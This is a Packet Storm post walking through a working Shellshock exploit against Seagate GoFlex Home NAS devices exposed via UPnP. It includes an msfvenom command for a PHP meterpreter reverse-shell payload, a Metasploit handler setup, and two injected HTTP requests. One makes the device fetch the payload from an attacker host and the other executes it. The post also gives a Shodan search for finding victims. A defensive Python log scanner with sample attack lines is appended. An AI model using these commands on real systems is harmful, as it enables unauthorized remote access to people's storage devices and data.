Seagate GoFlex Remote Shell

15 Nov 2015 | Reported by Anarchy Angel | Type: packetstorm | Source: packetstormsecurity.com

Seagate GoFlex Home Network Storage System vulnerable to Shellshock, accessible via UPNP, step-by-step guide for obtaining remote shell using msfvenom, burp suite, and metasploit handler

Code
`I have been scanning some ranges in my free time and came across a Seagate  
GoFlex Home Network Storage System which my scanner flagged as being  
vulnerable to shellshock but getting a remote shell was no easy task "for  
me anyway". I ended up having to build a payload with msfvenom and doing  
the execution using burp suite and handling the shell with metasploit  
handler. The best part is this device uses UPNP to tunnel to the Internet,  
giving us easy access >;)  
  
Start with the payload:  
  
msfvenom -p php/meterpreter/reverse_tcp lport=4444 lhost=1.2.3.4 >msf.txt  
  
  
Now upload msf.txt to your web server. After the payload is uploaded open  
metasploit and  
  
use exploit/multi/handler  
> set payload php/meterpreter/reverse_tcp  
> run  
  
  
That should start up our listener. Now we need to open up burp and use the  
repeater. Enter the following for the request:  
  
GET /support/ HTTP/1.1  
> Host: 5.6.7.8  
> User-Agent: () { :; }; echo Content-Type: text/plain; echo; echo;  
> PATH=/usr/bin:/usr/local/bin:/bin; export PATH; wget  
> http://1.2.3.4/msf.txt -O /tmp/msf.php2>&1;  
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
> Accept-Language: en-US,en;q=0.5  
> Accept-Encoding: gzip, deflate  
> Connection: keep-alive  
  
  
Also don't forget to configure the target correctly. Hit go and wait a few  
seconds and you should see some wget output and if all went well you should  
now have uploaded msf.php to the /tmp/ dir of the device. Now we just need  
to execute it. For this we use burp again. This time put this in the  
request:  
  
GET /support/ HTTP/1.1  
> Host: 5.6.7.8  
> User-Agent: () { :; }; echo Content-Type: text/plain; echo; echo;  
> PATH=/usr/bin:/usr/local/bin:/bin; export PATH; php /tmp/msf.php;  
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
> Accept-Language: en-US,en;q=0.5  
> Accept-Encoding: gzip, deflate  
> Connection: keep-alive  
  
  
This time when you hit Go, and your ports are forwarded correctly, you  
should be able to go back to our msfconsole window and see a session has  
opened. You won't have root at this point but you can still do a lot of fun  
stuff. You can find some of these devices on Shodan by searching for  
"hipname=". If anyone figures out how to get root please share :) Enjoy!  
  
*Count of vulnerable devices taken from Shodan search results, not actual  
testing.  
**I did not test it but you could try to use linux/x86/exec payload in bash  
bug exploit module to deploy and execute. This would allow you to keep it  
all in metasploit.  
  
Original post -  
http://aahideaway.blogspot.com/2015/11/getting-remote-shell-on-any-one-of.html  
Check it out for more information on this and other posts.  
`
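
From the defending side, both requests in the post leave the same trace in a web server access log: a User-Agent that begins with a bash function definition. The following added example (not part of the original post) scans Combined Log Format lines for that trigger and labels what the injected command does; the log lines, addresses and the function name `scan` are constructed for illustration.

```python
import re

# Combined Log Format: ip - user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# Shellshock trigger: a header value containing a bash function definition "() {"
TRIGGER_RE = re.compile(r"\(\s*\)\s*\{")
# What the injected command does after the trigger (the two stages seen in the post)
STAGE_RES = {
    "download": re.compile(r"\b(?:wget|curl)\b"),
    "tmp_path": re.compile(r"/tmp/"),
    "interpreter": re.compile(r"\b(?:php|perl|python|sh|bash)\s+/"),
}

def scan(lines):
    """Return one finding per log line whose Referer or User-Agent carries the trigger."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # not Combined Log Format; skipped rather than guessed at
        for field in ("referer", "agent"):
            value = m.group(field)
            if TRIGGER_RE.search(value):
                stages = sorted(k for k, rx in STAGE_RES.items() if rx.search(value))
                findings.append({"line": lineno, "ip": m.group("ip"),
                                 "request": m.group("request"), "field": field,
                                 "stages": stages})
                break
    return findings

# Constructed sample log (RFC 5737 documentation addresses, not real hosts)
SAMPLE_LOG = [
    '192.0.2.10 - - [15/Nov/2015:10:00:01 +0000] "GET /support/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [15/Nov/2015:10:02:13 +0000] "GET /support/ HTTP/1.1" 200 88 "-" '
    '"() { :; }; echo Content-Type: text/plain; echo; echo; wget http://203.0.113.5/x.txt -O /tmp/x.php"',
    '198.51.100.7 - - [15/Nov/2015:10:02:40 +0000] "GET /support/ HTTP/1.1" 200 0 "-" '
    '"() { :; }; PATH=/usr/bin:/bin; export PATH; php /tmp/x.php;"',
    '192.0.2.44 - - [15/Nov/2015:10:05:00 +0000] "GET /index.html HTTP/1.1" 200 900 "() { :;}; /bin/true" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f)
```

Access logs in this format record only Referer and User-Agent, so a trigger carried in another header (Cookie, for example) needs full request capture or a WAF rule to be seen.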
